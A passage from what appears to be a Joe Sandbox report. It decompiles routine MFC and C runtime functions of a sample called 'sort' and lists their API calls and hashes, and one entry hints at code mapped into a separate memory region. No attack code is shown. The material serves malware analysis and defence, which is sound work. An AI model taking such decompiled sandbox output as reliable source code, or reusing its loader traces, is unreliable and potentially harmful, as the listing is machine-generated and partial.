                                            				intOrPtr _t76;
                                            				void* _t77;
                                            
                                            				_t69 = __edx;
                                            				_push(__ecx);
                                            				_t71 = _a4;
                                            				_v8 = __ecx;
                                            				if( *((intOrPtr*)(_t71 + 0x6c)) == 0) {
                                            					L6:
                                            					if(( *(_t71 + 0x64) & 0x00000004) != 0) {
                                            						_a16 = _a16 | 0x00000004;
                                            						if((_a17 & 0x00000050) != 0) {
                                            							_a16 = _a16 & 0x0000002f | 0x00000020;
                                            						}
                                            					}
                                            					_t74 = E004225E5(_v8, _t77, _a16);
                                            					E0041663D(_t74, 0, _a8, _a12, 0, 0, 0x15);
                                            					if( *((intOrPtr*)(_t74 + 0x20)) == 0) {
                                            						_t29 = _t71 + 0x1c; // 0x9630a380
                                            						 *((intOrPtr*)(_t74 + 0x20)) =  *_t29;
                                            					}
                                            					E0041D196(E0041649C(_t74, 0xe81f), _t69, _t71, 0);
                                            					 *((intOrPtr*)( *_t74 + 0xc8))(1);
                                            					_t32 = _t71 + 0x1c; // 0x9630a380
                                            					_t42 = GetWindowLongA( *_t32, 0xfffffff0);
                                            					if((_t42 & 0x10000000) == 0) {
                                            						L14:
                                            						return _t42;
                                            					} else {
                                            						E0041668C(_t74, 8);
                                            						L13:
                                            						_t42 = UpdateWindow( *(_t74 + 0x1c));
                                            						goto L14;
                                            					}
                                            				}
                                            				_t4 = _t71 + 0x70; // 0xc8b8c35e
                                            				_t76 =  *_t4;
                                            				if(_t76 == 0 ||  *((intOrPtr*)(_t76 + 0x78)) == 0 || E0041D12E(_t76) != 1 || ( *(_t76 + 0x64) & _a16 & 0x000000f0) == 0) {
                                            					goto L6;
                                            				} else {
                                            					_t74 = E00413740(_t77, GetParent( *(_t76 + 0x1c)));
                                            					E0041663D(_t74, 0, _a8, _a12, 0, 0, 0x15);
                                            					 *((intOrPtr*)( *_t74 + 0xc8))(1);
                                            					goto L13;
                                            				}
                                            			}











                                            APIs
                                            • GetParent.USER32(?), ref: 004227EF
                                              • Part of subcall function 0041663D: SetWindowPos.USER32(?,?,?,?,?,?,00000000,?,00412218,00000000,00000000,00000000,00000000,00000000,00000097,00000000), ref: 00416664
                                            • GetWindowLongA.USER32 ref: 0042288C
                                            • UpdateWindow.USER32(?), ref: 004228A5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Window$LongParentUpdate
                                            • String ID: P
                                            • API String ID: 1906497633-3110715001
                                            • Opcode ID: 4c1a669f7961fc11da61d3b93e60f0e00272df2c871d8d7a3064cd67a7cf3fe7
                                            • Instruction ID: 4478c7b2db2806f657cab283070aca1dc542ec48e340ed71b02adf3b0aace616
                                            • Opcode Fuzzy Hash: 4c1a669f7961fc11da61d3b93e60f0e00272df2c871d8d7a3064cd67a7cf3fe7
                                            • Instruction Fuzzy Hash: C631F371700614BFDB21AF25DD48BAF7BA8FF04704F40062AF9015A2A1CB79EC51CB98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 96%
                                            			E004244A1(void* __edx) {
                                            				signed char* _v8;
                                            				char _v12;
                                            				int _v16;
                                            				void _v148;
                                            				unsigned int _t20;
                                            				int _t26;
                                            				signed int _t36;
                                            				struct HINSTANCE__* _t38;
                                            				struct HBITMAP__* _t39;
                                            				int _t41;
                                            				unsigned int _t43;
                                            				void* _t47;
                                            				signed int* _t48;
                                            				signed int _t53;
                                            				signed int _t57;
                                            				void* _t58;
                                            				void* _t60;
                                            
                                            				_t47 = __edx;
                                            				_t20 = GetMenuCheckMarkDimensions();
                                            				_t41 = _t20;
                                            				_t43 = _t20 >> 0x10;
                                            				_v16 = _t43;
                                            				if(_t41 > 0x20) {
                                            					_t41 = 0x20;
                                            				}
                                            				asm("cdq");
                                            				_t57 = _t41 + 0xf >> 4;
                                            				_t53 = (_t41 - 4 - _t47 >> 1) + (_t57 << 4) - _t41;
                                            				if(_t53 > 0xc) {
                                            					_t53 = 0xc;
                                            				}
                                            				_t26 = 0x20;
                                            				if(_t43 > _t26) {
                                            					_v16 = _t26;
                                            				}
                                            				E00406330( &_v148, 0xff, 0x80);
                                            				_v8 = 0x42c00c;
                                            				_t58 = _t57 + _t57;
                                            				_v12 = 5;
                                            				_t48 = _t60 + (_v16 + 0xfffffffa >> 1) * _t57 * 2 - 0x90;
                                            				do {
                                            					_v8 =  &(_v8[1]);
                                            					_t36 =  !(( *_v8 & 0x000000ff) << _t53);
                                            					_t48[0] = _t36;
                                            					 *_t48 = _t36;
                                            					_t48 = _t48 + _t58;
                                            					_t16 =  &_v12;
                                            					 *_t16 = _v12 - 1;
                                            				} while ( *_t16 != 0);
                                            				_t38 = CreateBitmap(_t41, _v16, 1, 1,  &_v148);
                                            				 *0x439c30 = _t38;
                                            				if(_t38 == 0) {
                                            					_t39 = LoadBitmapA(_t38, 0x7fe3);
                                            					 *0x439c30 = _t39;
                                            					return _t39;
                                            				}
                                            				return _t38;
                                            			}




















                                            APIs
                                            • GetMenuCheckMarkDimensions.USER32 ref: 004244AD
                                            • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 0042455C
                                            • LoadBitmapA.USER32 ref: 00424574
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu
                                            • String ID:
                                            • API String ID: 2596413745-3916222277
                                            • Opcode ID: 4b58320a925bd04fdb6ec626dd6c9f65210c363c85a9f202b098ebf0bc32f52f
                                            • Instruction ID: 209a20424c1af6e272a19c9ebc2633acba681278a5e608b332d2eb8150819f76
                                            • Opcode Fuzzy Hash: 4b58320a925bd04fdb6ec626dd6c9f65210c363c85a9f202b098ebf0bc32f52f
                                            • Instruction Fuzzy Hash: 39213A72F00225AFDB20DB78DC85BAEBBB4EB80304F454167E945EB282D7749A45CB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 94%
                                            			E0040E47A(void* __ecx) {
                                            				signed int _t22;
                                            				signed char _t36;
                                            				char* _t43;
                                            				void* _t45;
                                            
                                            				E00406520(E0042AE14, _t45);
                                            				_t22 =  *(_t45 + 8) & 0x00000007;
                                            				 *(__ecx + 4) = _t22;
                                            				_t36 =  *(__ecx + 8) & _t22;
                                            				if(_t36 != 0) {
                                            					if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
                                            						E004067EC(0, 0);
                                            					}
                                            					_t52 = _t36 & 0x00000004;
                                            					if((_t36 & 0x00000004) == 0) {
                                            						__eflags = _t36 & 0x00000002;
                                            						_t43 = "ios::failbit set";
                                            						if((_t36 & 0x00000002) == 0) {
                                            							_t43 = "ios::eofbit set";
                                            						}
                                            					} else {
                                            						_t43 = "ios::badbit set";
                                            					}
                                            					 *((char*)(_t45 - 0x1c)) =  *((intOrPtr*)(_t45 + 0xf));
                                            					E00401AE0(_t45 - 0x1c, 0);
                                            					E00401B90(_t45 - 0x1c, _t43, E00405A40(_t43));
                                            					_push(_t45 - 0x1c);
                                            					 *((intOrPtr*)(_t45 - 4)) = 0;
                                            					E0040E516(_t45 - 0x38, _t52);
                                            					 *((intOrPtr*)(_t45 - 0x38)) = 0x42f8c4;
                                            					_t22 = E004067EC(_t45 - 0x38, 0x433890);
                                            				}
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
                                            				return _t22;
                                            			}







                                            APIs
                                            • __EH_prolog.LIBCMT ref: 0040E47F
                                              • Part of subcall function 004067EC: RaiseException.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00406468,00000000), ref: 0040681A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: ExceptionH_prologRaise
                                            • String ID: ios::badbit set$ios::eofbit set$ios::failbit set
                                            • API String ID: 3968804221-425934345
                                            • Opcode ID: cfeb44f17044c624223737e36215371a86458169db6e3bb98e6d2c7d25448752
                                            • Instruction ID: 058c2687817cbb3025356127984514509d88e2cf1c36159cda0efedd272f4144
                                            • Opcode Fuzzy Hash: cfeb44f17044c624223737e36215371a86458169db6e3bb98e6d2c7d25448752
                                            • Instruction Fuzzy Hash: E41173B2D015196EC700EBA2D891AEEB778AF04358F44847BF41677282D77C5919CB68
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00418BE2(void* __eflags) {
                                            				intOrPtr _t22;
                                            				intOrPtr _t45;
                                            				void* _t47;
                                            				void* _t52;
                                            
                                            				_t52 = __eflags;
                                            				E00406520(E00429FAB, _t47);
                                            				_t22 =  *0x436980; // 0x436994
                                            				 *((intOrPtr*)(_t47 - 0x14)) = 0;
                                            				 *((intOrPtr*)(_t47 - 0x10)) = _t22;
                                            				_t45 = 1;
                                            				 *((intOrPtr*)(_t47 - 4)) = _t45;
                                            				GetFullPathNameA( *(_t47 + 0xc), 0x104, _t47 - 0x118, _t47 + 0xc);
                                            				 *( *(_t47 + 0xc)) = 0;
                                            				GetTempFileNameA(_t47 - 0x118, "MFC", 0, E00416CC1(_t47 - 0x10, _t47, 0x105));
                                            				E00416D10(_t47 - 0x10, _t52, 0xffffffff);
                                            				if( *((intOrPtr*)(_t47 + 0x10)) == 0) {
                                            					E00417B0B( *((intOrPtr*)(_t47 - 0x10)));
                                            				}
                                            				E00416861( *((intOrPtr*)(_t47 + 8)), _t47 - 0x10);
                                            				 *((intOrPtr*)(_t47 - 0x14)) = _t45;
                                            				 *((char*)(_t47 - 4)) = 0;
                                            				E00416AEC(_t47 - 0x10);
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0xc));
                                            				return  *((intOrPtr*)(_t47 + 8));
                                            			}







                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00418BE7
                                            • GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 00418C1A
                                            • GetTempFileNameA.KERNEL32(00000105,MFC,00000000,00000000,00000105), ref: 00418C40
                                              • Part of subcall function 00416D10: lstrlenA.KERNEL32(00000000,?,00416FC8,000000FF,?,00411ED7,?,?,?,0003C000,00000010,00000000,?,?), ref: 00416D23
                                              • Part of subcall function 00417B0B: DeleteFileA.KERNEL32(?), ref: 00417B0F
                                              • Part of subcall function 00417B0B: GetLastError.KERNEL32(00000000), ref: 00417B1A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: FileName$DeleteErrorFullH_prologLastPathTemplstrlen
                                            • String ID: MFC
                                            • API String ID: 501224598-3472178984
                                            • Opcode ID: 9a9022fc194ece3b065672907c030a6f4c508a25102b56638d347160a0d79358
                                            • Instruction ID: 106d24b416a7ad35a8895af97b87cb9fb89e8d85cfd421907a0314e2615bf241
                                            • Opcode Fuzzy Hash: 9a9022fc194ece3b065672907c030a6f4c508a25102b56638d347160a0d79358
                                            • Instruction Fuzzy Hash: 90114FB1A01219EFCF00EF94DC819EEB778FF04354F01456AF925A7290DB749A44CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 59%
                                            			E0042514B() {
                                            				signed short _v16;
                                            				signed short _v20;
                                            				char _v24;
                                            				signed int _t6;
                                            				intOrPtr* _t16;
                                            				signed int _t19;
                                            
                                            				_t6 =  *0x43687c; // 0xffffffff
                                            				if(_t6 != 0xffffffff) {
                                            					return _t6;
                                            				}
                                            				_t16 = GetProcAddress(GetModuleHandleA("COMCTL32.DLL"), "DllGetVersion");
                                            				_t19 = 0x40000;
                                            				if(_t16 != 0) {
                                            					E00406330( &_v24, 0, 0x14);
                                            					_v24 = 0x14;
                                            					_push( &_v24);
                                            					if( *_t16() >= 0) {
                                            						_t19 = (_v20 & 0x0000ffff) << 0x00000010 | _v16 & 0x0000ffff;
                                            					}
                                            				}
                                            				 *0x43687c = _t19;
                                            				return _t19;
                                            			}










                                            APIs
                                            • GetModuleHandleA.KERNEL32(COMCTL32.DLL,004036DA,?,?,004036DA,?,00000800,50402834,?,?,0000E800,?), ref: 00425162
                                            • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 0042516E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: AddressHandleModuleProc
                                            • String ID: COMCTL32.DLL$DllGetVersion
                                            • API String ID: 1646373207-1518460440
                                            • Opcode ID: 2a739991d6eb5f9aa751dae63f041506000971ef8fe04b880086a9e70bc82503
                                            • Instruction ID: 98511304bc6decc3b615f85e9ad6552c3d683fa4d8a624641396a172b3716892
                                            • Opcode Fuzzy Hash: 2a739991d6eb5f9aa751dae63f041506000971ef8fe04b880086a9e70bc82503
                                            • Instruction Fuzzy Hash: 61F04FB1F013396BE71097E9AC45BAA77A89B08754F910532EA10F3290E6B4D90487F9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 79%
                                            			E0041A759(struct HWND__* _a4, intOrPtr _a8) {
                                            				char _v16;
                                            				signed int _t13;
                                            
                                            				if(_a4 == 0 || (GetWindowLongA(_a4, 0xfffffff0) & 0x0000000f) != _a8) {
                                            					return 0;
                                            				} else {
                                            					GetClassNameA(_a4,  &_v16, 0xa);
                                            					_t13 = lstrcmpiA( &_v16, "combobox");
                                            					asm("sbb eax, eax");
                                            					return  ~_t13 + 1;
                                            				}
                                            			}






                                            APIs
                                            • GetWindowLongA.USER32 ref: 0041A76A
                                            • GetClassNameA.USER32(00000000,?,0000000A), ref: 0041A785
                                            • lstrcmpiA.KERNEL32(?,combobox), ref: 0041A794
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: ClassLongNameWindowlstrcmpi
                                            • String ID: combobox
                                            • API String ID: 2054663530-2240613097
                                            • Opcode ID: a59dd8cb4dc7832684d3d012d2b80f62c9ff4b7594d5d7a01661a6692601d5aa
                                            • Instruction ID: 62da548da4bc7eed7f0096d352448fc276db36428101ee4b016d1f9566c4e5fc
                                            • Opcode Fuzzy Hash: a59dd8cb4dc7832684d3d012d2b80f62c9ff4b7594d5d7a01661a6692601d5aa
                                            • Instruction Fuzzy Hash: 66E0E53164020CBFCF219F60CC49F9D37B8E700305F508222B422D50E0D774E2968B99
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 022421F9
                                            • SetLastError.KERNEL32(0000007E), ref: 0224223B
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931652161.0000000002241000.00000020.00000001.sdmp, Offset: 02241000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2241000_sort.jbxd
                                            Similarity
                                            • API ID: ErrorHugeLastRead
                                            • String ID:
                                            • API String ID: 3239643929-0
                                            • Opcode ID: 22e466c1eab41c1afe8ef641dabf4e9276b766de88caa58412351ad9921ea2d7
                                            • Instruction ID: 1794e8db7e05d53f8fe4b74861cdc161bea041c8c89146419deee20f1b98ea31
                                            • Opcode Fuzzy Hash: 22e466c1eab41c1afe8ef641dabf4e9276b766de88caa58412351ad9921ea2d7
                                            • Instruction Fuzzy Hash: 2081BB75A10209DFDB08CF95C894BADBBB1FF48314F248298E909AB355C774EA81CF90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0040FD44(signed int _a4, signed int _a8, long _a12) {
                                            				void _v5;
                                            				signed int _v12;
                                            				long _v16;
                                            				signed int _t75;
                                            				void* _t78;
                                            				intOrPtr _t82;
                                            				signed char _t83;
                                            				signed char _t85;
                                            				long _t86;
                                            				void* _t88;
                                            				signed char _t90;
                                            				signed char _t91;
                                            				signed int _t95;
                                            				intOrPtr _t96;
                                            				char _t98;
                                            				signed int _t99;
                                            				long _t101;
                                            				long _t102;
                                            				signed int _t103;
                                            				intOrPtr _t106;
                                            				signed int _t108;
                                            				signed int _t109;
                                            				signed int _t111;
                                            				signed char _t112;
                                            				signed char* _t113;
                                            				long _t115;
                                            				void* _t119;
                                            				signed int _t120;
                                            				intOrPtr* _t121;
                                            				signed int _t123;
                                            				signed char* _t124;
                                            				void* _t125;
                                            				void* _t126;
                                            
                                            				_v12 = _v12 & 0x00000000;
                                            				_t108 = _a8;
                                            				_t119 = _t108;
                                            				if(_a12 == 0) {
                                            					L42:
                                            					__eflags = 0;
                                            					return 0;
                                            				}
                                            				_t75 = _a4;
                                            				_t111 = _t75 >> 5;
                                            				_t121 = 0x43b520 + _t111 * 4;
                                            				_t123 = (_t75 & 0x0000001f) + (_t75 & 0x0000001f) * 8 << 2;
                                            				_t78 =  *((intOrPtr*)(0x43b520 + _t111 * 4)) + _t123;
                                            				_t112 =  *((intOrPtr*)(_t78 + 4));
                                            				if((_t112 & 0x00000002) != 0) {
                                            					goto L42;
                                            				}
                                            				if((_t112 & 0x00000048) != 0) {
                                            					_t106 =  *((intOrPtr*)(_t78 + 5));
                                            					if(_t106 != 0xa) {
                                            						_a12 = _a12 - 1;
                                            						 *_t108 = _t106;
                                            						_t119 = _t108 + 1;
                                            						_v12 = 1;
                                            						 *((char*)( *_t121 + _t123 + 5)) = 0xa;
                                            					}
                                            				}
                                            				if(ReadFile( *( *_t121 + _t123), _t119, _a12,  &_v16, 0) != 0) {
                                            					_t82 =  *_t121;
                                            					_t120 = _v16;
                                            					_v12 = _v12 + _t120;
                                            					_t31 = _t123 + 4; // 0x4
                                            					_t113 = _t82 + _t31;
                                            					_t83 =  *((intOrPtr*)(_t82 + _t123 + 4));
                                            					__eflags = _t83 & 0x00000080;
                                            					if((_t83 & 0x00000080) == 0) {
                                            						L41:
                                            						return _v12;
                                            					}
                                            					__eflags = _t120;
                                            					if(_t120 == 0) {
                                            						L15:
                                            						_t85 = _t83 & 0x000000fb;
                                            						__eflags = _t85;
                                            						L16:
                                            						 *_t113 = _t85;
                                            						_t86 = _a8;
                                            						_a12 = _t86;
                                            						_t115 = _v12 + _t86;
                                            						__eflags = _t86 - _t115;
                                            						_v12 = _t115;
                                            						if(_t86 >= _t115) {
                                            							L40:
                                            							_t109 = _t108 - _a8;
                                            							__eflags = _t109;
                                            							_v12 = _t109;
                                            							goto L41;
                                            						} else {
                                            							goto L17;
                                            						}
                                            						while(1) {
                                            							L17:
                                            							_t88 =  *_a12;
                                            							__eflags = _t88 - 0x1a;
                                            							if(_t88 == 0x1a) {
                                            								break;
                                            							}
                                            							__eflags = _t88 - 0xd;
                                            							if(_t88 == 0xd) {
                                            								__eflags = _a12 - _t115 - 1;
                                            								if(_a12 >= _t115 - 1) {
                                            									_a12 = _a12 + 1;
                                            									_t95 = ReadFile( *( *_t121 + _t123),  &_v5, 1,  &_v16, 0);
                                            									__eflags = _t95;
                                            									if(_t95 != 0) {
                                            										L26:
                                            										__eflags = _v16;
                                            										if(_v16 == 0) {
                                            											L34:
                                            											 *_t108 = 0xd;
                                            											L35:
                                            											_t108 = _t108 + 1;
                                            											__eflags = _t108;
                                            											L36:
                                            											_t115 = _v12;
                                            											__eflags = _a12 - _t115;
                                            											if(_a12 < _t115) {
                                            												continue;
                                            											}
                                            											goto L40;
                                            										}
                                            										_t96 =  *_t121;
                                            										__eflags =  *(_t96 + _t123 + 4) & 0x00000048;
                                            										if(( *(_t96 + _t123 + 4) & 0x00000048) == 0) {
                                            											__eflags = _t108 - _a8;
                                            											if(__eflags != 0) {
                                            												L33:
                                            												E0040AE93(__eflags, _a4, 0xffffffff, 1);
                                            												_t126 = _t126 + 0xc;
                                            												__eflags = _v5 - 0xa;
                                            												if(_v5 == 0xa) {
                                            													goto L36;
                                            												}
                                            												goto L34;
                                            											}
                                            											__eflags = _v5 - 0xa;
                                            											if(__eflags != 0) {
                                            												goto L33;
                                            											}
                                            											L32:
                                            											 *_t108 = 0xa;
                                            											goto L35;
                                            										}
                                            										_t98 = _v5;
                                            										__eflags = _t98 - 0xa;
                                            										if(_t98 == 0xa) {
                                            											goto L32;
                                            										}
                                            										 *_t108 = 0xd;
                                            										_t108 = _t108 + 1;
                                            										 *((char*)( *_t121 + _t123 + 5)) = _t98;
                                            										goto L36;
                                            									}
                                            									_t99 = GetLastError();
                                            									__eflags = _t99;
                                            									if(_t99 != 0) {
                                            										goto L34;
                                            									}
                                            									goto L26;
                                            								}
                                            								_t101 = _a12 + 1;
                                            								__eflags =  *_t101 - 0xa;
                                            								if( *_t101 != 0xa) {
                                            									 *_t108 = 0xd;
                                            									_t108 = _t108 + 1;
                                            									_a12 = _t101;
                                            									goto L36;
                                            								}
                                            								_a12 = _a12 + 2;
                                            								goto L32;
                                            							}
                                            							 *_t108 = _t88;
                                            							_t108 = _t108 + 1;
                                            							_a12 = _a12 + 1;
                                            							goto L36;
                                            						}
                                            						_t124 =  *_t121 + _t123 + 4;
                                            						_t90 =  *_t124;
                                            						__eflags = _t90 & 0x00000040;
                                            						if((_t90 & 0x00000040) == 0) {
                                            							_t91 = _t90 | 0x00000002;
                                            							__eflags = _t91;
                                            							 *_t124 = _t91;
                                            						}
                                            						goto L40;
                                            					}
                                            					__eflags =  *_t108 - 0xa;
                                            					if( *_t108 != 0xa) {
                                            						goto L15;
                                            					}
                                            					_t85 = _t83 | 0x00000004;
                                            					goto L16;
                                            				}
                                            				_t102 = GetLastError();
                                            				_t125 = 5;
                                            				if(_t102 != _t125) {
                                            					__eflags = _t102 - 0x6d;
                                            					if(_t102 == 0x6d) {
                                            						goto L42;
                                            					}
                                            					_t103 = E00406F05(_t102);
                                            					L10:
                                            					return _t103 | 0xffffffff;
                                            				}
                                            				 *((intOrPtr*)(E00406F78())) = 9;
                                            				_t103 = E00406F81();
                                            				 *_t103 = _t125;
                                            				goto L10;
                                            			}




































                                            0x0040fecd
                                            0x00000000
                                            0x00000000
                                            0x0040fecf
                                            0x0040fecf
                                            0x00000000
                                            0x0040fecf
                                            0x0040feb1
                                            0x0040feb4
                                            0x0040feb6
                                            0x00000000
                                            0x00000000
                                            0x0040feb8
                                            0x0040febd
                                            0x0040febe
                                            0x00000000
                                            0x0040febe
                                            0x0040fe98
                                            0x0040fe9e
                                            0x0040fea0
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040fea0
                                            0x0040fe65
                                            0x0040fe66
                                            0x0040fe69
                                            0x0040fe71
                                            0x0040fe74
                                            0x0040fe75
                                            0x00000000
                                            0x0040fe75
                                            0x0040fe6b
                                            0x00000000
                                            0x0040fe6b
                                            0x0040fe51
                                            0x0040fe53
                                            0x0040fe54
                                            0x00000000
                                            0x0040fe54
                                            0x0040fefd
                                            0x0040ff01
                                            0x0040ff03
                                            0x0040ff05
                                            0x0040ff07
                                            0x0040ff07
                                            0x0040ff09
                                            0x0040ff09
                                            0x00000000
                                            0x0040ff05
                                            0x0040fe1d
                                            0x0040fe20
                                            0x00000000
                                            0x00000000
                                            0x0040fe22
                                            0x00000000
                                            0x0040fe22
                                            0x0040fdc8
                                            0x0040fdd0
                                            0x0040fdd3
                                            0x0040fde9
                                            0x0040fdec
                                            0x00000000
                                            0x00000000
                                            0x0040fdf3
                                            0x0040fdf9
                                            0x00000000
                                            0x0040fdf9
                                            0x0040fdda
                                            0x0040fde0
                                            0x0040fde5
                                            0x00000000

                                            APIs
                                            • ReadFile.KERNEL32(?,?,00000000,?,00000000,?,?), ref: 0040FDBE
                                            • GetLastError.KERNEL32(?,?), ref: 0040FDC8
                                            • ReadFile.KERNEL32(?,?,00000001,?,00000000,?,?), ref: 0040FE8E
                                            • GetLastError.KERNEL32(?,?), ref: 0040FE98
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: ErrorFileLastRead
                                            • String ID:
                                            • API String ID: 1948546556-0
                                            • Opcode ID: 23115844c508a177bbe59758e9f8f5cb7ac59ad074daaa557504e197aa77565a
                                            • Instruction ID: d01b3c0b8dd5da0b8901ede80a7d7d1cd1fd8d123d1325fb95f4599fb7a38ff2
                                            • Opcode Fuzzy Hash: 23115844c508a177bbe59758e9f8f5cb7ac59ad074daaa557504e197aa77565a
                                            • Instruction Fuzzy Hash: 7051C7306043859FDF31CF58C88479A7BB0EF12304F5445BBE851AB6E2D378994ACB99
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 92%
                                            			E0041FCEC(void* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
                                            				intOrPtr _v8;
                                            				intOrPtr _v12;
                                            				struct tagRECT _v28;
                                            				struct tagRECT _v44;
                                            				struct tagRECT _v60;
                                            				void* _t79;
                                            				int _t81;
                                            				intOrPtr* _t83;
                                            				intOrPtr _t87;
                                            				intOrPtr _t106;
                                            				int _t120;
                                            				void* _t128;
                                            				void* _t132;
                                            				intOrPtr _t138;
                                            				void* _t140;
                                            				void* _t143;
                                            
                                            				_t140 = __edi;
                                            				_t128 = __ecx;
                                            				_t79 = _a4 -  *((intOrPtr*)(__ecx + 4));
                                            				_t132 = _a8 -  *((intOrPtr*)(__ecx + 8));
                                            				_t138 =  *((intOrPtr*)(__ecx + 0x8c));
                                            				_t143 = 2;
                                            				if(_t138 == 0xa) {
                                            					L7:
                                            					 *((intOrPtr*)(_t128 + 0x28)) =  *((intOrPtr*)(_t128 + 0x28)) + _t79;
                                            					L9:
                                            					_t81 =  *((intOrPtr*)(_t128 + 0x30)) -  *((intOrPtr*)(_t128 + 0x28));
                                            					__eflags = _t81;
                                            					L10:
                                            					if(_t81 < 0) {
                                            						_t81 = 0;
                                            					}
                                            					_t83 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t128 + 0x68)))) + 0xbc))( &(_v28.right), _t81, _t143, _t140);
                                            					_v12 =  *_t83;
